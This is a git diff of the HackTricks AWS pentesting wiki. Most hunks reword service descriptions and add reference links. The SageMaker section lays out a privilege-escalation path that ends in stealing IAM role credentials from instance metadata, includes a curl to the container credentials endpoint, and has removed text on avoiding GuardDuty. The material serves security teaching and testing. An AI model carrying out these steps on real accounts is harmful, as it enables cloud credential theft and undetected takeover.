Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index 496565fe6b..01fb82dd95 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -18,42 +18,33 @@ Other ways to support HackTricks: ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` -The first step in this attack process is to **identify a role that trusts SageMaker to assume it** (sagemaker.amazonaws.com). Once that’s done, we can run the following command to create a new notebook with that role attached: +Start creating a noteboook with the IAM Role to access attached to it: ``` aws sagemaker create-notebook-instance --notebook-instance-name example \ --instance-type ml.t2.medium \ - --role-arn arn:aws:iam::ACCOUNT-ID:role/service-role/AmazonSageMaker-ExecutionRole-xxxxxx + --role-arn arn:aws:iam:::role/service-role/ ``` -If successful, you will receive the **ARN of the new notebook instance** in the response from AWS. That will take **a few minutes** to spin up, but once it has done so, we can run the following command to get a pre-signed URL to get **access to the notebook instance through our web browser**. There are potentially other ways to gain access, but this is a single permission and single API call, so it seemed simple. +The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready: ```bash aws sagemaker create-presigned-notebook-instance-url \ --notebook-instance-name ``` -If this instance was fully spun up, this API call will return a **signed URL that we can visit** in our browser to access the instance. Once at the Jupyter page in my browser, I’ll click "Open JupyterLab" in the top right, which can be seen in the following screenshot. +Navigate to the URL with the browser and click on `Open JupyterLab`` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. -![](<../../../.gitbook/assets/image (15) (1) (1).png>) - -From the next page, scroll all the way down in the “Launcher” tab. Under the “Other” section, click the “Terminal” button, which can be seen here. - -![](<../../../.gitbook/assets/image (27).png>) - -From the terminal we have a few options, one of which would be to just **use the AWS CLI**. The other option would be to **contact the EC2 metadata** service for the IAM role’s credentials directly and exfiltrate them. - -GuardDuty might come to mind when reading “exfiltrate them” above, however, we don’t actually need to worry about GuardDuty here. The related GuardDuty finding is [“UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration”](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_unauthorized.html#unauthorized11), which will alert if a role’s credentials are stolen from an EC2 instance and used elsewhere. Luckily for us, this EC2 instance doesn’t actually live in our account, but instead it is a **managed EC2 instance hosted in an AWS-owned account**. That means that **we can exfiltrate these credentials and not worry about triggering** our target’s GuardDuty detectors. +Now It's possible to access the metadata credentials of the IAM Role. **Potential Impact:** Privesc to the sagemaker service role specified. ### `sagemaker:CreatePresignedNotebookInstanceUrl` -Similar to the previous example, if Jupyter **notebooks are already running** on it and you can list them with sagemaker:ListNotebookInstances (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**. +If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**. ```bash -aws sagemaker create-presigned-notebook-instance-url \ - --notebook-instance-name +aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name ``` **Potential Impact:** Privesc to the sagemaker service role attached. @@ -129,6 +120,9 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ _I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ +# References +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index bf29b55ae8..75fbcac1e4 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -16,17 +16,17 @@ Other ways to support HackTricks: ## Basic Information -**AWS Certificate Manager (ACM)** is a service designed to simplify the provisioning, management, and deployment of SSL/TLS certificates for AWS services and internal resources. It **eliminates the manual steps involved** in purchasing, uploading, and renewing these certificates. With ACM, users can easily request and deploy certificates on various AWS resources like Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway. +**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**. -ACM also takes care of **automatic certificate renewals**. Additionally, it allows for the creation and centralized management of **private certificates for internal use**. SSL/TLS certificates provided through ACM for use exclusively with integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are free, but users pay for any AWS resources used to run applications and a monthly fee for the operation of each **private Certificate Authority (CA)** and for private certificates used outside of ACM-integrated services. +A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services. -**AWS Private Certificate Authority** is a **managed private CA** service that **extends ACM certificate management to private certificates**. With private certificates you can authenticate resources inside an organization. +**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization. ## Enumeration ### ACM -``` +```bash # List certificates aws acm list-certificates @@ -42,7 +42,7 @@ aws acm get-account-configuration ### PCM -``` +```bash # List CAs aws acm-pca list-certificate-authorities diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md index 25b81a863e..144a0b3bac 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## CloudFormation -AWS CloudFormation is a service that helps you **model and set up your AWS resources** so that you can spend **less time managing those resources** and more time focusing on your applications that run in AWS. You create a **template that describes all the AWS resources** that you want, and CloudFormation takes care of provisioning and configuring those resources for you. +AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. ### Enumeration @@ -78,6 +78,9 @@ In the following page you can check how to **abuse codestar permissions to escal [aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/) {% endcontent-ref %} +# References +* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md index be87484b49..6122ca6518 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md @@ -16,7 +16,14 @@ Other ways to support HackTricks: ## CodeBuild -AWS **CodeBuild** is a fully **managed continuous integration service that compiles source code, runs tests, and produces software packages that are ready to deploy**. With CodeBuild, you don’t need to provision, manage, and scale your own build servers. +AWS **CodeBuild** is a **fully managed continuous integration service**. It automates the process of compiling source code, conducting tests, and packaging the software for deployment. The main advantage of using CodeBuild is that it eliminates the need to provision, manage, and scale build servers, as these tasks are handled by the service itself. The key features of AWS CodeBuild include: + +1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. +2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. +3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. + +AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. + ### Enumeration @@ -61,6 +68,9 @@ In the following page, you can check how to **abuse codebuild permissions to esc [aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) {% endcontent-ref %} +# References +* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md index 976c944e13..fb109af5d8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md @@ -16,9 +16,13 @@ Other ways to support HackTricks: ## Cognito -Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple. +Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. -The two main components of Amazon Cognito are **user pools** and **identity pools**. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to **grant your users access to other AWS services**. +Central to Amazon Cognito are two primary components: + +1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. + +2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. ### **User pools** diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index eb2fd34d42..93a128c54e 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -16,13 +16,36 @@ Other ways to support HackTricks: ## Basic Information -With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools: +Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include: -* Amazon Cognito user pools -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple -* OpenID Connect (OIDC) providers -* SAML identity providers -* Developer authenticated identities +- Amazon Cognito user pools +- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple +- Providers compliant with OpenID Connect (OIDC) +- SAML (Security Assertion Markup Language) identity providers +- Developer authenticated identities + +```python +# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: +import boto3 + +# Initialize the Amazon Cognito Identity client +client = boto3.client('cognito-identity') + +# Assume you have already created an identity pool and obtained the IdentityPoolId +identity_pool_id = 'your-identity-pool-id' + +# Add an identity provider to the identity pool +response = client.set_identity_pool_roles( + IdentityPoolId=identity_pool_id, + Roles={ + 'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', + 'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', + } +) + +# Print the response from AWS +print(response) +``` ### Cognito Sync diff --git a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md index 1511773399..d1b1c3b88b 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## DocumentDB -Amazon DocumentDB (with MongoDB compatibility) is a fast, reliable, and **fully managed database service**. Amazon DocumentDB makes it easy to set up, operate, and **scale MongoDB-compatible databases in the cloud**. With Amazon DocumentDB, you can run the same application code and use the same drivers and tools that you use with MongoDB. +Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. ### Enumeration @@ -45,6 +45,9 @@ As DocumentDB is a MongoDB compatible database, you can imagine it's also vulner [aws-documentdb-enum.md](../../aws-unauthenticated-enum-access/aws-documentdb-enum.md) {% endcontent-ref %} +# References +* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md index 5895e56cfa..dbb835af0a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md @@ -18,9 +18,10 @@ Other ways to support HackTricks: ### Basic Information -Amazon DynamoDB is a **fully managed, serverless, key-value NoSQL database** designed to run high-performance applications at any scale. DynamoDB offers built-in security, continuous backups, automated multi-Region replication, in-memory caching, and data export tools. +Amazon DynamoDB is recognized as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities. + +In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization. -In DynamoDB you don't create a DB but you **create a table**. Each table needs to have configured a **partition ke**y is part of the **table's primary key**. It is a **hash value** that is used to retrieve items from your table and allocate data across hosts for scalability and availability. It's also possible to configure a **sort key**. ### Encryption diff --git a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md index 9f506fed3f..399d931bad 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md @@ -16,11 +16,20 @@ Other ways to support HackTricks: ## Basic Information -**Relational Database Service (RDS)** is a managed database service that simplifies the process of setting up, operating, and scaling a **relational database in the cloud**. AWS RDS provides cost-efficient and resizable capacity, and it automates time-consuming administration tasks, such as hardware provisioning, database setup, patching, and backups. +The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups. -AWS RDS supports **several popular relational database engines**: MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server & Amazon Aurora compatible with MySQL or with PostgreSQL. +AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL. + +Key features of RDS include: + +- **Management of database instances** is simplified. +- Creation of **read replicas** to enhance read performance. +- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. +- **Integration** with other AWS services, such as: + - AWS Identity and Access Management (**IAM**) for robust access control. + - AWS **CloudWatch** for comprehensive monitoring and metrics. + - AWS Key Management Service (**KMS**) for ensuring encryption at rest. -With RDS, you can easily manage database instances, create read **replicas** to increase read **performance**, and set up **multi-Availability Zone (AZ)** deployments for high availability and failover support. Additionally, RDS **integrates** with other AWS services, such as AWS Identity and Access Management (**IAM**) for **access control**, AWS **CloudWatch** for monitoring and metrics, and AWS Key Management Service (**KMS**) for encryption at rest. ## Credentials @@ -55,13 +64,26 @@ It's not possible to add this level of encryption after your database has been c However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. -#### TDE Encryption +#### Transparent Data Encryption (TDE) + +Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions. + +To utilize TDE, certain preliminary steps are required: + +1. **Option Group Association**: + - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. + - However, it's important to note that option groups are only available for specific database engines and versions. -In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions. +2. **Inclusion of TDE in Option Group**: + - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. + - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. -If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions. +3. **TDE Encryption Modes**: + - TDE offers two distinct encryption modes: + - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. + - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. -Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database. +Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. ### Enumeration diff --git a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index c02f849857..4bb9e5461d 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -16,7 +16,17 @@ Other ways to support HackTricks: ## DataPipeline -With AWS Data Pipeline, you can regularly a**ccess your data where it’s stored**, **transform** and **process it at scale**, and efficiently transfer the results to AWS services such as Amazon S3, Amazon RDS, Amazon DynamoDB, and Amazon EMR. +AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed: + +1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. +2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. +3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: + - Amazon S3 + - Amazon RDS + - Amazon DynamoDB + - Amazon EMR + +In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. ### Enumeration @@ -98,6 +108,9 @@ ssh-keygen -f .ssh/id_rsa -l -E md5 git clone ssh://@git-codecommit..amazonaws.com/v1/repos/ ``` +# References +* [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index 6b708590d4..2f52d7e9f1 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -24,7 +24,7 @@ Learn what a VPC is and about its components in: ## EC2 -You can use Amazon EC2 to launch **virtual servers**, configure **security** and **networking**, and manage **storage**. Amazon EC2 enables you to scale up or down to handle changes in requirements or spikes in popularity, reducing your need to forecast traffic. +Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions. Interesting things to enumerate in EC2: @@ -331,6 +331,9 @@ If a **VPN connection was stablished** you should search for **`.opvn`** config [aws-vpn-post-exploitation.md](../../aws-post-exploitation/aws-vpn-post-exploitation.md) {% endcontent-ref %} +# References +* [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index c1e8ed7685..46c043ed39 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -18,7 +18,7 @@ Other ways to support HackTricks: ### Basic Information -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. Customers can use the familiar Docker CLI, or their preferred client, to push, pull, and manage images. +Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. ECR is compose by 2 types of objects: **Registries** and **Repositories**. @@ -108,6 +108,9 @@ In the following page you can check how to **abuse ECR permissions to escalate p [aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md) {% endcontent-ref %} +# References +* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md index c7f0284a3e..e811596c72 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md @@ -16,7 +16,15 @@ Other ways to support HackTricks: ## EKS -Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service that you can use to run Kubernetes on AWS without needing to install, operate, and maintain your own Kubernetes control plane or nodes. +Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. + +Key aspects of Amazon EKS include: + +1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. +2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. +3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. +4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. + ### Enumeration @@ -44,6 +52,9 @@ aws eks describe-update --name --update-id [aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) {% endcontent-ref %} +# References +* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md index fb701654eb..b0538f3081 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md @@ -16,23 +16,40 @@ Other ways to support HackTricks: ## EMR -EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark. +AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. -From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters. +Key characteristics include: -One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available. +- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: + - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. + - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: + - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. + - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider. -* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm. +- **Encryption in Transit**: Focuses on securing data during transfer. Options include: + - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: + - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. + - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. -From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. +Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: -Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. +- **Hadoop**: + - Might reduce encrypted shuffle using TLS. + - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. + +- **Presto** (EMR version 5.6.0+): + - Internal communication between Presto nodes is secured using SSL and TLS. + +- **Tez Shuffle Handler**: + - Utilizes TLS for encryption. + +- **Spark**: + - Employs TLS for the Akka protocol. + - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. + - External shuffle service is secured with the Simple Authentication Security Layer. + +These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. -* Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration. -* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. -* Tez Shuffle Handler uses TLS. -* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. ### Enumeration @@ -53,6 +70,9 @@ aws emr list-studios #Get studio URLs [aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md) {% endcontent-ref %} +# References +* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) +
